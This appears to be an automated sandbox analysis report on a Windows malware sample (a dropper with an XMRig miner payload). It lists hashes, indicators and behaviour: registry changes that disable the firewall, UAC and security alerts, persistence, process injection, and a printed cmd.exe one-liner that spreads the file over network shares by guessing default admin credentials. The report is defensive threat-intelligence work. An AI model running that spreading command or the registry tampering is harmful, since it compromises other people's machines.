Analysis
-
max time kernel
53s -
max time network
296s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 22:27
Static task
static1
Behavioral task
behavioral1
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
General
-
Target
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
-
Size
2.3MB
-
MD5
921379bd587ab29da4dc23fb9d47fe36
-
SHA1
e9db1731731503a81a2fdc67ffa005e6aa2a8038
-
SHA256
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
-
SHA512
90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 6 IoCs
Processes:
VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" VID001.exe -
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe xmrig behavioral2/memory/1696-24-0x0000000000400000-0x00000000009E7000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
VID001.exepid process 2464 VID001.exe -
Processes:
resource yara_rule behavioral2/memory/4692-2-0x00000000024B0000-0x000000000353E000-memory.dmp upx behavioral2/memory/2464-9-0x00000000023E0000-0x000000000346E000-memory.dmp upx -
Deletes itself 1 IoCs
Processes:
VID001.exepid process 2464 VID001.exe -
Drops startup file 1 IoCs
Processes:
VID001.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk VID001.exe -
Loads dropped DLL 2 IoCs
Processes:
VID001.exepid process 2464 VID001.exe 2464 VID001.exe -
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" VID001.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc VID001.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
VID001.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run VID001.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ VID001.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run VID001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ VID001.exe -
Processes:
VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
VID001.exedescription ioc process File opened (read-only) \??\S: VID001.exe File opened (read-only) \??\U: VID001.exe File opened (read-only) \??\V: VID001.exe File opened (read-only) \??\W: VID001.exe File opened (read-only) \??\Z: VID001.exe File opened (read-only) \??\G: VID001.exe File opened (read-only) \??\I: VID001.exe File opened (read-only) \??\J: VID001.exe File opened (read-only) \??\L: VID001.exe File opened (read-only) \??\P: VID001.exe File opened (read-only) \??\Y: VID001.exe File opened (read-only) \??\M: VID001.exe File opened (read-only) \??\N: VID001.exe File opened (read-only) \??\Q: VID001.exe File opened (read-only) \??\R: VID001.exe File opened (read-only) \??\X: VID001.exe File opened (read-only) \??\E: VID001.exe File opened (read-only) \??\F: VID001.exe File opened (read-only) \??\H: VID001.exe File opened (read-only) \??\K: VID001.exe File opened (read-only) \??\O: VID001.exe File opened (read-only) \??\T: VID001.exe -
Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in Windows directory 1 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process File opened for modification C:\Windows\SYSTEM.INI 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\0F747584_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\0F747584_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe nsis_installer_2 -
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3052 taskkill.exe 3800 taskkill.exe 1776 taskkill.exe 4456 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exepid process 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe 2464 VID001.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription pid process Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 2464 VID001.exe Token: SeDebugPrivilege 2464 VID001.exe Token: SeDebugPrivilege 2464 VID001.exe Token: SeDebugPrivilege 2464 VID001.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription pid process target process PID 4692 wrote to memory of 700 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe fontdrvhost.exe PID 4692 wrote to memory of 704 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe fontdrvhost.exe PID 4692 wrote to memory of 968 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe dwm.exe PID 4692 wrote to memory of 2336 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe sihost.exe PID 4692 wrote to memory of 2344 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe svchost.exe PID 4692 wrote to memory of 2540 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe taskhostw.exe PID 4692 wrote to memory of 3028 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Explorer.EXE PID 4692 wrote to memory of 3248 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe ShellExperienceHost.exe PID 4692 wrote to memory of 3260 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe SearchUI.exe PID 4692 wrote to memory of 3488 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe RuntimeBroker.exe PID 4692 wrote to memory of 3780 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe DllHost.exe PID 4692 wrote to memory of 2464 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe VID001.exe PID 4692 wrote to memory of 2464 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe VID001.exe PID 4692 wrote to memory of 2464 4692 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe VID001.exe PID 2464 wrote to memory of 700 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 704 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 968 2464 VID001.exe dwm.exe PID 2464 wrote to memory of 2336 2464 VID001.exe sihost.exe PID 2464 wrote to memory of 2344 2464 VID001.exe svchost.exe PID 2464 wrote to memory of 2540 2464 VID001.exe taskhostw.exe PID 2464 wrote to memory of 3028 2464 VID001.exe Explorer.EXE PID 2464 wrote to memory of 3248 2464 VID001.exe ShellExperienceHost.exe PID 2464 wrote to memory of 3260 2464 VID001.exe SearchUI.exe PID 2464 wrote to memory of 3488 2464 VID001.exe RuntimeBroker.exe PID 2464 wrote to memory of 3780 2464 VID001.exe DllHost.exe PID 2464 wrote to memory of 3464 2464 VID001.exe DllHost.exe PID 2464 wrote to memory of 700 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 704 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 968 2464 VID001.exe dwm.exe PID 2464 wrote to memory of 2336 2464 VID001.exe sihost.exe PID 2464 wrote to memory of 2344 2464 VID001.exe svchost.exe PID 2464 wrote to memory of 2540 2464 VID001.exe taskhostw.exe PID 2464 wrote to memory of 3028 2464 VID001.exe Explorer.EXE PID 2464 wrote to memory of 3248 2464 VID001.exe ShellExperienceHost.exe PID 2464 wrote to memory of 3260 2464 VID001.exe SearchUI.exe PID 2464 wrote to memory of 3488 2464 VID001.exe RuntimeBroker.exe PID 2464 wrote to memory of 3780 2464 VID001.exe DllHost.exe PID 2464 wrote to memory of 828 2464 VID001.exe backgroundTaskHost.exe PID 2464 wrote to memory of 1264 2464 VID001.exe slui.exe PID 2464 wrote to memory of 700 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 704 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 968 2464 VID001.exe dwm.exe PID 2464 wrote to memory of 2336 2464 VID001.exe sihost.exe PID 2464 wrote to memory of 2344 2464 VID001.exe svchost.exe PID 2464 wrote to memory of 2540 2464 VID001.exe taskhostw.exe PID 2464 wrote to memory of 3028 2464 VID001.exe Explorer.EXE PID 2464 wrote to memory of 3248 2464 VID001.exe ShellExperienceHost.exe PID 2464 wrote to memory of 3260 2464 VID001.exe SearchUI.exe PID 2464 wrote to memory of 3488 2464 VID001.exe RuntimeBroker.exe PID 2464 wrote to memory of 3780 2464 VID001.exe DllHost.exe PID 2464 wrote to memory of 828 2464 VID001.exe backgroundTaskHost.exe PID 2464 wrote to memory of 700 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 704 2464 VID001.exe fontdrvhost.exe PID 2464 wrote to memory of 968 2464 VID001.exe dwm.exe PID 2464 wrote to memory of 2336 2464 VID001.exe sihost.exe PID 2464 wrote to memory of 2344 2464 VID001.exe svchost.exe PID 2464 wrote to memory of 2540 2464 VID001.exe taskhostw.exe PID 2464 wrote to memory of 3028 2464 VID001.exe Explorer.EXE PID 2464 wrote to memory of 3248 2464 VID001.exe ShellExperienceHost.exe PID 2464 wrote to memory of 3260 2464 VID001.exe SearchUI.exe PID 2464 wrote to memory of 3488 2464 VID001.exe RuntimeBroker.exe PID 2464 wrote to memory of 3780 2464 VID001.exe DllHost.exe PID 2464 wrote to memory of 828 2464 VID001.exe backgroundTaskHost.exe PID 2464 wrote to memory of 700 2464 VID001.exe fontdrvhost.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"2⤵
- Modifies firewall policy service
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NsCpuCNMiner*5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im IMG0*5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im uihost*5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im DOC0*5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe"C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"5⤵
-
C:\Windows\SysWOW64\net.exenet view6⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\find.exefind /i "\\"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_5⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
-
C:\Windows\System32\slui.exeC:\Windows\System32\slui.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0F747584_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeMD5
2915b3f8b703eb744fc54c81f4a9c67f
SHA1e10361a11f8a7f232ac3cb2125c1875a0a69a3e4
SHA2569f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
